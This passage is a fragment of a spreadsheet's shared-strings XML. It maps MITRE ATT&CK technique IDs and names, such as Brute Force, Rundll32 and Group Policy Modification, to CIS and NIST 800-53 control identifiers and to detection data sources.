    <t>File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>Native API</t>
  </si>
  <si>
    <t>AC-6,CM-2,CM-6,CM-7,SI-2,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1108</t>
  </si>
  <si>
    <t>Redundant Access</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>4.1,4.7,5.2,5.3,6.3,6.4,6.5,4.10</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CA-7,CM-2,CM-6,IA-11,IA-2,IA-4,IA-5,SI-4</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1110.001</t>
  </si>
  <si>
    <t>Password Guessing</t>
  </si>
  <si>
    <t>4.1,4.7,5.2,6.3,6.4,6.5,4.10</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1110.002</t>
  </si>
  <si>
    <t>Password Cracking</t>
  </si>
  <si>
    <t>4.7,5.2,6.3,6.4,6.5</t>
  </si>
  <si>
    <t>T1110.003</t>
  </si>
  <si>
    <t>Password Spraying</t>
  </si>
  <si>
    <t>T1110.004</t>
  </si>
  <si>
    <t>Credential Stuffing</t>
  </si>
  <si>
    <t>T1111</t>
  </si>
  <si>
    <t>Two-Factor Authentication Interception</t>
  </si>
  <si>
    <t>14.1,14.3</t>
  </si>
  <si>
    <t>CA-7,CM-2,CM-6,IA-2,IA-5,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>AC-6,CM-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1113</t>
  </si>
  <si>
    <t>Screen Capture</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>6.3,6.5,18.3,18.5,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-19,AC-20,AC-3,AC-4,CM-2,CM-6,IA-2,IA-5,SC-7,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1114.001</t>
  </si>
  <si>
    <t>Local Email Collection</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-19,AC-20,AC-4,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1114.002</t>
  </si>
  <si>
    <t>Remote Email Collection</t>
  </si>
  <si>
    <t>6.3,6.4,6.5,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-19,AC-20,AC-3,AC-4,CM-2,CM-6,IA-2,IA-5,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>T1114.003</t>
  </si>
  <si>
    <t>Email Forwarding Rule</t>
  </si>
  <si>
    <t>18.3,18.5,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-19,AC-20,AC-4,CM-6,SC-43,SC-7,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>Clipboard Data</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>Automated Collection</t>
  </si>
  <si>
    <t>3.11,11.4,12.8</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-20,CM-2,CM-6,CM-8,CP-6,CP-7,CP-9,SC-36,SC-4,SI-12,SI-23,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Script: Script Execution</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>Peripheral Device Discovery</t>
  </si>
  <si>
    <t>T1123</t>
  </si>
  <si>
    <t>Audio Capture</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t>System Time Discovery</t>
  </si>
  <si>
    <t>T1125</t>
  </si>
  <si>
    <t>Video Capture</t>
  </si>
  <si>
    <t>T1127</t>
  </si>
  <si>
    <t>Trusted Developer Utilities Proxy Execution</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,4.8,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,CM-8,RA-5,SI-10,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1127.001</t>
  </si>
  <si>
    <t>MSBuild</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,4.8,18.3,18.5</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-8,RA-5,SI-4</t>
  </si>
  <si>
    <t>T1129</t>
  </si>
  <si>
    <t>Shared Modules</t>
  </si>
  <si>
    <t>2.5,2.6</t>
  </si>
  <si>
    <t>CM-2,CM-7,SI-10,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>Data Encoding</t>
  </si>
  <si>
    <t>T1132.001</t>
  </si>
  <si>
    <t>Standard Encoding</t>
  </si>
  <si>
    <t>T1132.002</t>
  </si>
  <si>
    <t>Non-Standard Encoding</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>External Remote Services</t>
  </si>
  <si>
    <t>2.3,2.5,3.12,4.1,4.2,4.4,4.8,6.3,6.4,6.5,7.6,7.7,12.2,12.7,12.8,13.5,16.8,18.3,18.5,13.10,16.10</t>
  </si>
  <si>
    <t>AC-17,AC-20,AC-23,AC-3,AC-4,AC-6,AC-7,CM-2,CM-6,CM-7,CM-8,IA-2,IA-5,RA-5,SC-46,SC-7,SI-4,SI-7</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>Access Token Manipulation</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>T1134.001</t>
  </si>
  <si>
    <t>Token Impersonation/Theft</t>
  </si>
  <si>
    <t>T1134.002</t>
  </si>
  <si>
    <t>Create Process with Token</t>
  </si>
  <si>
    <t>T1134.003</t>
  </si>
  <si>
    <t>Make and Impersonate Token</t>
  </si>
  <si>
    <t>T1134.004</t>
  </si>
  <si>
    <t>Parent PID Spoofing</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Creation, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1134.005</t>
  </si>
  <si>
    <t>SID-History Injection</t>
  </si>
  <si>
    <t>AC-20,AC-3,AC-4,AC-5,AC-6,CM-2,CM-6,SA-11,SA-17,SA-4,SA-8,SC-3</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Process: OS API Execution, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>Network Share Discovery</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>3.12,4.1,4.2,4.4,4.7,5.3,5.4,6.1,6.2,6.3,6.4,6.5,11.3,11.4,12.2,12.8,18.3,18.5</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, User Account: User Account Creation</t>
  </si>
  <si>
    <t>T1136.001</t>
  </si>
  <si>
    <t>4.7,5.3,5.4,6.1,6.2,6.4,6.5</t>
  </si>
  <si>
    <t>T1136.002</t>
  </si>
  <si>
    <t>3.12,4.1,4.2,4.4,4.7,5.3,5.4,6.1,6.2,6.4,6.5,11.3,11.4,12.2,12.8,18.3,18.5</t>
  </si>
  <si>
    <t>T1136.003</t>
  </si>
  <si>
    <t>3.12,4.2,4.4,4.7,5.3,5.4,6.1,6.2,6.3,6.4,6.5,11.3,11.4,12.2,12.8,16.8</t>
  </si>
  <si>
    <t>User Account: User Account Creation</t>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>Office Application Startup</t>
  </si>
  <si>
    <t>2.3,2.7,4.1,4.8,7.1,7.2,7.3,7.4,7.5,7.7,9.4,18.3,18.5</t>
  </si>
  <si>
    <t>AC-10,AC-17,AC-6,CM-2,CM-6,CM-8,RA-5,SC-18,SC-44,SI-2,SI-3,SI-4,SI-8</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1137.001</t>
  </si>
  <si>
    <t>Office Template Macros</t>
  </si>
  <si>
    <t>2.3,2.7,4.1,4.8,9.4,18.3,18.5</t>
  </si>
  <si>
    <t>AC-6,CM-2,CM-6,CM-8,RA-5,SC-18,SC-44,SI-3,SI-4,SI-8</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1137.002</t>
  </si>
  <si>
    <t>Office Test</t>
  </si>
  <si>
    <t>AC-10,AC-14,AC-17,AC-6,CM-2,CM-5,CM-6,SC-18,SC-44,SI-8</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1137.003</t>
  </si>
  <si>
    <t>Outlook Forms</t>
  </si>
  <si>
    <t>7.1,7.2,7.3,7.4,7.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-6,CM-2,CM-6,SC-18,SC-44,SI-2,SI-8</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1137.004</t>
  </si>
  <si>
    <t>Outlook Home Page</t>
  </si>
  <si>
    <t>T1137.005</t>
  </si>
  <si>
    <t>Outlook Rules</t>
  </si>
  <si>
    <t>T1137.006</t>
  </si>
  <si>
    <t>Add-ins</t>
  </si>
  <si>
    <t>AC-6,CM-2,CM-6,SC-18,SC-44,SI-8</t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information</t>
  </si>
  <si>
    <t>File: File Modification, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1149</t>
  </si>
  <si>
    <t>LC_MAIN Hijacking</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1153</t>
  </si>
  <si>
    <t>Source</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>T1175</t>
  </si>
  <si>
    <t>Component Object Model and Distributed COM</t>
  </si>
  <si>
    <t> </t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,9.4,14.4,18.3,18.5</t>
  </si>
  <si>
    <t>AC-6,CA-7,CA-8,CM-11,CM-2,CM-3,CM-5,CM-6,CM-7,RA-5,SC-7,SI-10,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>Browser Session Hijacking</t>
  </si>
  <si>
    <t>3.3,4.7,5.3,6.1,6.2,6.8,14.4</t>
  </si>
  <si>
    <t>AC-10,AC-12,AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,IA-2,SC-23,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Process: Process Access, Process: Process Modification</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>4.2,4.4,4.7,5.2,7.6,7.7,13.4,18.2,18.3</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,SC-7,SI-10,SI-15,SI-4</t>
  </si>
  <si>
    <t>File: File Access, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>Drive-by Compromise</t>
  </si>
  <si>
    <t>2.3,2.7,7.1,7.2,7.4,7.5,9.1,9.3,9.6,10.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-4,AC-6,CA-7,CM-2,CM-6,CM-8,SA-22,SC-18,SC-2,SC-29,SC-3,SC-30,SC-39,SC-7,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>3.12,4.4,4.7,5.3,5.5,6.1,6.2,6.8,7.1,7.2,7.3,7.4,7.6,7.7,10.5,12.1,12.2,12.8,16.13,16.8,18.1,18.2,18.3,13.10</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-2,CA-7,CM-5,CM-6,CM-7,CM-8,IA-2,IA-8,RA-10,RA-5,SA-8,SC-18,SC-2,SC-29,SC-3,SC-30,SC-39,SC-46,SC-7,SI-10,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1195</t>
  </si>
  <si>
    <t>Supply Chain Compromise</t>
  </si>
  <si>
    <t>7.1,7.2,7.3,7.4,7.5,16.1,16.11,16.12,16.2,16.3,16.4,16.5,18.3,18.5</t>
  </si>
  <si>
    <t>CA-2,CA-7,CM-11,CM-7,RA-10,RA-5,SA-22,SI-2</t>
  </si>
  <si>
    <t>File: File Metadata, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1195.001</t>
  </si>
  <si>
    <t>Compromise Software Dependencies and Development Tools</t>
  </si>
  <si>
    <t>T1195.002</t>
  </si>
  <si>
    <t>Compromise Software Supply Chain</t>
  </si>
  <si>
    <t>T1195.003</t>
  </si>
  <si>
    <t>Compromise Hardware Supply Chain</t>
  </si>
  <si>
    <t>3.6,4.1</t>
  </si>
  <si>
    <t>CA-8,CM-3,CM-5,CM-8,IA-7,RA-9,SA-10,SA-11,SC-34,SI-2,SI-7</t>
  </si>
  <si>
    <t>Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>4.1,4.2,4.4,4.5,4.7,5.3,5.4,6.1,6.2,6.8,13.4,18.2,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-5,CM-6,CM-7,IA-2,SC-7,SI-10,SI-15,SI-4</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>Trusted Relationship</t>
  </si>
  <si>
    <t>3.12,4.1,4.4,12.2,12.8,15.7</t>
  </si>
  <si>
    <t>AC-3,AC-4,AC-6,AC-8,CM-6,CM-7,SC-46,SC-7</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>1.1,1.2,1.4,4.1,4.2,12.2,12.6,13.9</t>
  </si>
  <si>
    <t>AC-20,AC-3,AC-6,MP-7,SC-41</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Drive: Drive Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>Password Policy Discovery</t>
  </si>
  <si>
    <t>CA-7,CM-2,CM-6,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>Indirect Command Execution</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</t>
  </si>
  <si>
    <t>AC-4,AC-6,CA-7,CM-8,SC-18,SC-2,SC-29,SC-3,SC-30,SC-39,SC-44,SC-7,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>User Execution</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,9.3,9.6,13.3,13.8,14.1,14.2,14.6</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,CM-7,SC-44,SC-7,SI-10,SI-2,SI-3,SI-4,SI-7,SI-8</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</si>
  <si>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</si>
  <si>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T1204.001</t>
  </si>
  <si>
    <t>Malicious Link</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,CM-7,SC-44,SC-7,SI-2,SI-3,SI-4,SI-8</t>
  </si>
  <si>
    <t>File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1204.002</t>
  </si>
  <si>
    <t>Malicious File</t>
  </si>
  <si>
    <t>2.5,2.7,14.1,14.2,14.6</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,CM-7,SC-44,SC-7,SI-10,SI-3,SI-4,SI-7,SI-8</t>
  </si>
  <si>
    <t>File: File Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1204.003</t>
  </si>
  <si>
    <t>Malicious Image</t>
  </si>
  <si>
    <t>AC-4,CA-7,CA-8,CM-2,CM-6,CM-7,RA-5,SC-44,SC-7,SI-2,SI-3,SI-4,SI-7,SI-8,SR-11,SR-4,SR-5,SR-6</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Container: Container Creation, Container: Container Start, Image: Image Creation, Instance: Instance Creation, Instance: Instance Start</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>Traffic Signaling</t>
  </si>
  <si>
    <t>4.2,4.4,7.7,13.4</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,SC-7,SI-15,SI-4</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1205.001</t>
  </si>
  <si>
    <t>Port Knocking</t>
  </si>
  <si>
    <t>4.2,4.4,13.4</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-6,CM-7,SC-7,SI-15,SI-4</t>
  </si>
  <si>
    <t>T1205.002</t>
  </si>
  <si>
    <t>Socket Filters</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>Rogue Domain Controller</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Modification, Network Traffic: Network Traffic Content, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</t>
  </si>
  <si>
    <t>2.3,2.5,3.12,4.1,4.4,4.7,4.8,5.3,5.5,6.1,6.2,6.8,7.1,7.2,7.3,7.4,7.5,7.6,10.5,12.2,12.8,16.13,16.8,18.1,18.2,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-2,CA-7,CA-8,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-8,RA-10,RA-5,SC-18,SC-2,SC-26,SC-29,SC-3,SC-30,SC-35,SC-39,SC-46,SC-7,SI-2,SI-3,SI-4,SI-5,SI-7</t>
  </si>
  <si>
    <t>T1211</t>
  </si>
  <si>
    <t>Exploitation for Defense Evasion</t>
  </si>
  <si>
    <t>AC-4,AC-6,CA-7,CA-8,CM-2,CM-6,CM-8,RA-10,RA-5,SC-18,SC-2,SC-26,SC-29,SC-3,SC-30,SC-35,SC-39,SC-7,SI-2,SI-3,SI-4,SI-5,SI-7</t>
  </si>
  <si>
    <t>T1212</t>
  </si>
  <si>
    <t>Exploitation for Credential Access</t>
  </si>
  <si>
    <t>AC-2,AC-4,AC-6,CA-7,CA-8,CM-2,CM-6,CM-8,RA-10,RA-5,SC-18,SC-2,SC-26,SC-29,SC-3,SC-30,SC-35,SC-39,SC-7,SI-2,SI-3,SI-4,SI-5,SI-7</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Process: Process Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1213</t>
  </si>
  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t>3.1,3.2,3.3,4.7,5.3,6.1,6.2,6.8,14.1,14.4,14.5,16.1,16.9,18.3,18.5</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-2,AC-21,AC-23,AC-3,AC-4,AC-5,AC-6,CA-7,CA-8,CM-2,CM-3,CM-5,CM-6,CM-7,CM-8,IA-2,IA-4,IA-8,RA-5,SC-28,SI-4,SI-7</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>T1213.001</t>
  </si>
  <si>
    <t>Confluence</t>
  </si>
  <si>
    <t>T1213.002</t>
  </si>
  <si>
    <t>Sharepoint</t>
  </si>
  <si>
    <t>T1213.003</t>
  </si>
  <si>
    <t>Code Repositories</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,IA-2,IA-9,RA-5,SA-10,SA-11,SA-15,SA-3,SA-8,SI-2</t>
  </si>
  <si>
    <t>T1216</t>
  </si>
  <si>
    <t>Signed Script Proxy Execution</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,SI-10,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1216.001</t>
  </si>
  <si>
    <t>PubPrn</t>
  </si>
  <si>
    <t>T1217</t>
  </si>
  <si>
    <t>Browser Bookmark Discovery</t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,4.7,4.8,5.3,5.4,6.1,6.2,6.8,10.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-11,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,RA-5,SI-10,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Module: Module Load, Network Traffic: Network Connection Creation, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1218.001</t>
  </si>
  <si>
    <t>Compiled HTML File</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,9.3,9.6</t>
  </si>
  <si>
    <t>CM-11,CM-2,CM-6,CM-7,SC-18,SI-10,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1218.002</t>
  </si>
  <si>
    <t>Control Panel</t>
  </si>
  <si>
    <t>2.5,2.7,4.1,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-3,CA-7,CM-11,CM-2,CM-6,CM-7,SI-10,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Module: Module Load, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1218.003</t>
  </si>
  <si>
    <t>CMSTP</t>
  </si>
  <si>
    <t>CM-11,CM-2,CM-6,CM-7,CM-8,RA-5,SI-10,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1218.004</t>
  </si>
  <si>
    <t>InstallUtil</t>
  </si>
  <si>
    <t>T1218.005</t>
  </si>
  <si>
    <t>Mshta</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1218.007</t>
  </si>
  <si>
    <t>Msiexec</t>
  </si>
  <si>
    <t>2.7,4.1,4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-2,CM-5,CM-6,CM-7,IA-2</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1218.008</t>
  </si>
  <si>
    <t>Odbcconf</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1218.009</t>
  </si>
  <si>
    <t>Regsvcs/Regasm</t>
  </si>
  <si>
    <t>T1218.010</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>CA-7,SI-10,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1218.011</t>
  </si>
  <si>
    <t>Rundll32</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1218.012</t>
  </si>
  <si>
    <t>Verclsid</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,4.2,4.4,4.5,4.8,7.6,7.7,13.4,18.2,18.3,18.5</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-11,CM-2,CM-6,CM-7,CM-8,RA-5,SC-7,SI-10,SI-15,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1218.013</t>
  </si>
  <si>
    <t>Mavinject</t>
  </si>
  <si>
    <t>T1218.014</t>
  </si>
  <si>
    <t>MMC</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>Remote Access Software</t>
  </si>
  <si>
    <t>2.5,4.2,4.4,7.6,9.3,13.3,13.4,13.8,18.2,18.3</t>
  </si>
  <si>
    <t>AC-17,AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,SC-7,SI-10,SI-15,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1220</t>
  </si>
  <si>
    <t>XSL Script Processing</t>
  </si>
  <si>
    <t>Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>Template Injection</t>
  </si>
  <si>
    <t>2.3,2.7,4.1,4.8,13.3,13.8,14.1,14.2,14.6,18.3,18.5</t>
  </si>
  <si>
    <t>CA-7,CM-2,CM-6,CM-7,CM-8,RA-5,SC-44,SC-7,SI-10,SI-2,SI-3,SI-4,SI-7,SI-8</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation</t>
  </si>
  <si>
    <t>T1222</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-3,AC-5,AC-6,CA-7,CM-5,CM-6,IA-2,SI-4,SI-7</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>T1222.001</t>
  </si>
  <si>
    <t>Windows File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>T1222.002</t>
  </si>
  <si>
    <t>Linux and Mac File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>T1480</t>
  </si>
  <si>
    <t>Execution Guardrails</t>
  </si>
  <si>
    <t>Don't Mitigate</t>
  </si>
  <si>
    <t>T1480.001</t>
  </si>
  <si>
    <t>Environmental Keying</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>Domain Trust Discovery</t>
  </si>
  <si>
    <t>3.12,4.1,4.4,11.3,11.4,12.2,12.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-4,CA-8,CM-6,CM-7,RA-5,SA-17,SA-8,SC-46,SC-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1484</t>
  </si>
  <si>
    <t>Domain Policy Modification</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,5.5,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-8,CM-2,CM-5,CM-6,CM-7,IA-2,RA-5,SI-4</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Deletion, Active Directory: Active Directory Object Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>T1484.001</t>
  </si>
  <si>
    <t>Group Policy Modification</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
